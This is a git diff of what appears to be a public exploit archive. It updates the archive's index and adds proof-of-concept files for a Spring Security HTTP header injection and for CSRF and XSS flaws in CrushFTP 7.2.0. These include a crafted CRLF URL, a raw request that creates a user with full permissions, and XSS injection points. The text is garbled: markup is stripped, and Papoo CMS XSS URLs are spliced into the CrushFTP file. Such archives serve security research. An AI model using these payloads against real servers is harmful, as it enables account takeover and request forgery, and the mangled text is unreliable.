diff --git a/files.csv b/files.csv index 4224383e2..3b616ace4 100755 --- a/files.csv +++ b/files.csv @@ -31912,7 +31912,6 @@ id,file,description,date,author,platform,type,port 35422,platforms/hardware/webapps/35422.txt,"IPUX CS7522/CS2330/CS2030 IP Camera - (UltraHVCamX.ocx) ActiveX Stack Buffer Overflow",2014-12-02,LiquidWorm,hardware,webapps,0 35423,platforms/windows/local/35423.txt,"Thomson Reuters Fixed Assets CS <=13.1.4 - Privileges Escalation",2014-12-02,"Information Paradox",windows,local,0 35424,platforms/php/webapps/35424.py,"ProjectSend r-561 - Arbitrary File Upload",2014-12-02,"Fady Mohammed Osman",php,webapps,0 -35426,platforms/windows/remote/35426.pl,"Tiny Server 1.1.9 - Arbitrary File Disclosure Exploit",2014-12-02,"ZoRLu Bugrahan",windows,remote,0 35427,platforms/bsd/remote/35427.py,"tnftp - clientside BSD Exploit",2014-12-02,dash,bsd,remote,0 35428,platforms/php/webapps/35428.txt,"SQL Buddy 1.3.3 - Remote Code Execution",2014-12-02,"Fady Mohammed Osman",php,webapps,0 35429,platforms/php/webapps/35429.txt,"PhotoSmash Galleries WordPress Plugin 1.0.x - 'action' Parameter Cross-Site Scripting Vulnerability",2011-03-08,"High-Tech Bridge SA",php,webapps,0 @@ -32552,3 +32551,10 @@ id,file,description,date,author,platform,type,port 36121,platforms/php/webapps/36121.txt,"Zikula Application Framework 1.2.7/1.3 'themename' Parameter Cross Site Scripting Vulnerability",2011-09-05,"High-Tech Bridge SA",php,webapps,0 36122,platforms/php/webapps/36122.txt,"SkaDate 'blogs.php' Cross Site Scripting Vulnerability",2011-09-08,sonyy,php,webapps,0 36123,platforms/php/webapps/36123.txt,"In-link 2.3.4/5.1.3 RC1 'cat' Parameter SQL Injection Vulnerability",2011-09-08,SubhashDasyam,php,webapps,0 +36124,platforms/php/remote/36124.txt,"jQuery jui_filter_rules PHP Code Execution",2015-02-19,"Timo Schmid",php,remote,80 +36125,platforms/php/webapps/36125.txt,"Piwigo 2.7.3 - SQL Injection",2015-02-19,"Sven Schleier",php,webapps,80 +36126,platforms/multiple/webapps/36126.txt,"CrushFTP 7.2.0 - Multiple Vulnerabilities",2015-02-19,"Rehan Ahmed",multiple,webapps,8080 +36127,platforms/php/webapps/36127.txt,"Piwigo 2.7.3 - Multiple Vulnerabilities",2015-02-19,"Steffen Rösemann",php,webapps,80 +36129,platforms/php/webapps/36129.txt,"Pluck 4.7 Multiple Local File Include and File Disclosure Vulnerabilities",2011-09-08,Bl4k3,php,webapps,0 +36130,platforms/multiple/remote/36130.txt,"Spring Security HTTP Header Injection Vulnerability",2011-09-09,"David Mas",multiple,remote,0 +36131,platforms/php/webapps/36131.txt,"Papoo CMS Light 4.0 Multiple Cross Site Scripting Vulnerabilities",2011-09-12,"Stefan Schurtz",php,webapps,0 diff --git a/platforms/multiple/remote/36130.txt b/platforms/multiple/remote/36130.txt new file mode 100755 index 000000000..6ce2a6dae --- /dev/null +++ b/platforms/multiple/remote/36130.txt @@ -0,0 +1,12 @@ +source: http://www.securityfocus.com/bid/49535/info + +Spring Security is prone to a vulnerability that allows attackers to inject arbitrary HTTP headers because it fails to sufficiently sanitize input. + +By inserting arbitrary headers into an HTTP response, attackers may be able to launch various attacks, including cross-site request forgery, cross-site scripting, and HTTP-request smuggling. + +The following versions are vulnerable: + +Spring Security 2.0.0 through 2.0.6 +Spring Security 3.0.0 through 3.0.5 + +http://www.example.com//mywebapp/logout/spring-security-redirect=%0d%0a%20NewHeader%3ainjectedValue \ No newline at end of file diff --git a/platforms/multiple/webapps/36126.txt b/platforms/multiple/webapps/36126.txt new file mode 100755 index 000000000..fe89943f7 --- /dev/null +++ b/platforms/multiple/webapps/36126.txt @@ -0,0 +1,132 @@ +======================================================== + I. Overview + ======================================================== + Multiple CSRF & Cross-Site Scripting (XSS) vulnerabilities have been identified in + Crushftp 7.2.0 (Web Interface) on default configuration. These vulnerabilities allows + an attacker to gain control over valid user accounts, perform operations + on their behalf, redirect them to malicious sites, steal their credentials, + and more. + ======================================================== + II. Severity + ======================================================== + Rating: Medium + Remote: Yes + Authentication Require: Yes + ======================================================== + III. Vendor's Description of Application + ======================================================== + CrushFTP is a robust file transfer server that makes it easy to setup secure connections with your users. +'Crush' comes from the built-in zip methods in CrushFTP. They allow for downloading files in compressed formats in-stream, +or even automatically expanding zip files as they are received in-stream. This is called ZipStreaming and can greatly accelerate +the transfer of many types of files. +Secure management is web based allowing you the ability to manage and monitor the server from anywhere, or with almost any device. +Easy in place server upgrades without complicated installers. Runs as a daemon, or Windows service with no need for a local GUI. +CrushFTP is watching out for you by detecting common hack attempts and robots which scan for weak passwords. It will automatically +protect you against DDoS attacks. No need for you to do anything as CrushFTP will automatically ban these IPs to prevent wasted logging and CPU usage. +This keeps your server secure from unwanted abuse. +User management includes inheritance, groups, and virtual file systems. If you want simple user management, +it can be as easy as just making a folder with a specific name and nothing else. +Think about how easily you can delegate user administration with CrushFTP's role based administration and event configuration. +http://www.crushftp.com/index.html + + ======================================================== + IV. Vulnerability Details & Exploit + ======================================================== + + 1) Multiple CSRF Vulnerabilities (Web Management interface - Default Config) + + a) An attacker may add/delete/modify user's accounts + b) May change all configuration settings + +Request Method: POST +Location: /WebInterface/fuction/ + +Proof of Concept:- + + + + +
+ + + + + Hacker<&&47;username>123456<&&47;password>0<&&47;max&&95;logins>&&47;<&&47;root&&95;dir><&&47;user>" /> + + <&&47;vfs>" /> + &&40;read&&41;&&40;write&&41;&&40;view&&41;&&40;resume&&41;<&&47;item><&&47;permissions>" /> + + + + + +2) Multiple Cross-Site Scripting (Web Interface - Default Config) + +Type: Reflected +Request Method: POST +Location: /WebInterface/function/ +Parameter: vfs_items +Values: + vfs_items = + + +Proof of Concept: + +POST /WebInterface/function/ HTTP/1.1 +Host: 127.0.0.1:8080 +User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Referer: http://127.0.0.1:8080/WebInterface/UserManager/index.html +Content-Length: 656 +Cookie: XXXXXXXXXXXXXXXXXXXXX +Connection: keep-alive +Pragma: no-cache +Cache-Control: no-cache + +command=setUserItem&data_action=new&serverGroup=MainUsers&username=test&user=%3C%3Fxml+version%3D%221.0%22+encoding%3D%22UTF-8%22%3F%3E%3Cuser+type%3D%22properties%22%3E%3Cusername%3Etest2%3C%2Fusername%3E%3Cpassword%3Etest2%3C%2Fpassword%3E%3Cmax_logins%3E0%3C%2Fmax_logins%3E%3Croot_dir%3E%2F%3C%2Froot_dir%3E%3C%2Fuser%3E&xmlItem=user&vfs_items=%3C%3Fxml+version%3D%221.0%22+encoding%3D%22UTF-8%22%3F%3E%3Cvfs+type%3D%22properties%22%3E%3C%2Fvfs%3E&permissions=%3C%3Fxml+version%3D%221.0%22+encoding%3D%22UTF-8%22%3F%3E%3Cpermissions+type%3D%22properties%22%3E%3Citem+name%3D%22%2F%22%3E(read)(view)(resume)%3C%2Fitem%3E%3C%2Fpermissions%3E + + +Type: Reflected +Request Method: GET +Location: /WebInterface/function/ +Parameter: path +Values: +http://www.example.com/papoo/papoo_light/kontakt.php/"> +http://www.example.com/papoo/papoo_light/inhalt.php/"> +http://www.example.com/papoo/papoo_light/forum.php/"> +http://www.example.com/papoo/papoo_light/guestbook.php/"> +http://www.example.com/papoo/papoo_light/account.php/"> +http://www.example.com/papoo/papoo_light/login.php/"> +http://www.example.com/papoo/papoo_light/index/"> +http://www.example.com/papoo/papoo_light/forumthread.php/"> +http://www.example.com/papoo/papoo_light/forum/">